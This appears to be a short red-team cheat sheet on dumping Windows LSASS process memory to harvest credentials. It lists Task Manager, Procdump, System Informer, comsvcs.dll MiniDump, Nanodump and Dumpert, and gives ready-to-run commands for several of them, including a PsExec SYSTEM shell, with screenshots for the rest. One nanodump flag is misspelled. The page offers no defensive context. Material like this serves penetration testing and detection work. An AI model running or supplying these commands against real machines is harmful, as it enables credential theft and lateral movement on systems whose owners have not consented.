# LSASS Dumping

## LSASS - Techniques

* Task Manager
* Procdump
* System Informer
* Comsvcs.dll
* Nanodump
* Dumpert

## Lsass Dump: Task Manager

<figure><img src="https://1937981690-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FzuuWuDn9s4dQ1J0kb7tE%2Fuploads%2F00aKROSA8aKjv1uPuNs1%2Fimage.png?alt=media&#x26;token=949ebf5b-c31a-452e-a8a4-762dfe4485e2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1937981690-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FzuuWuDn9s4dQ1J0kb7tE%2Fuploads%2FfNCK9V1qNRxaO0m7xIMX%2Fimage.png?alt=media&#x26;token=f0ca56aa-f79a-46eb-9e7d-0d5c3664c695" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1937981690-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FzuuWuDn9s4dQ1J0kb7tE%2Fuploads%2Fwss7wegwupLwUK2KRJIb%2Fimage.png?alt=media&#x26;token=a231f40d-a372-4a1a-9f51-85773b28a6a1" alt=""><figcaption></figcaption></figure>

```sh
procdump.exe -accepteula -ma lsass.exe lsadump.dmp
```

Lsass Dump: System
&#x20;Informer
--------------

<figure><img src="https://1937981690-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FzuuWuDn9s4dQ1J0kb7tE%2Fuploads%2FdKY3MoypyFftmu7ckvWU%2Fimage.png?alt=media&#x26;token=389d2b4b-e569-4410-aee6-7bcdd2041d11" alt=""><figcaption></figcaption></figure>

## Lsass Dump: Comsvcs.dll

<figure><img src="https://1937981690-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FzuuWuDn9s4dQ1J0kb7tE%2Fuploads%2FGJTiyQPtOMTqajmTnoeH%2Fimage.png?alt=media&#x26;token=cba57ba6-c15a-45bc-b265-7ec63eefd989" alt=""><figcaption></figcaption></figure>

```sh
./PsExec -i -d -s cmd.exe
```

```sh
C:\Windows\System32\comsvcs.dll, MiniDump 688 C:\Users\<user>\Documente\cred_tools\lsass_dump\dmp\lsass.dmp full
```

## Lsass Dump: Nanodump

<figure><img src="https://1937981690-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FzuuWuDn9s4dQ1J0kb7tE%2Fuploads%2FnQuMZmNEjUtIJLdelvjC%2Fimage.png?alt=media&#x26;token=c24704bd-12b2-44a2-9608-81a0318b8eec" alt=""><figcaption></figcaption></figure>

```sh
./nanodump.x64.exe --write normal_lsass.dmp
```

```sh
./nanodump.x64.exe --silen-process-exit .\wer_lsas
```

## Lsass Dump: Dumpert

<figure><img src="https://1937981690-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FzuuWuDn9s4dQ1J0kb7tE%2Fuploads%2FrjYrHlxkT8VMiGwEeZLo%2Fimage.png?alt=media&#x26;token=45e39355-8613-4663-965f-aeb4daf6efa6" alt=""><figcaption></figcaption></figure>

```sh
Outflank-Dumpert.exe
```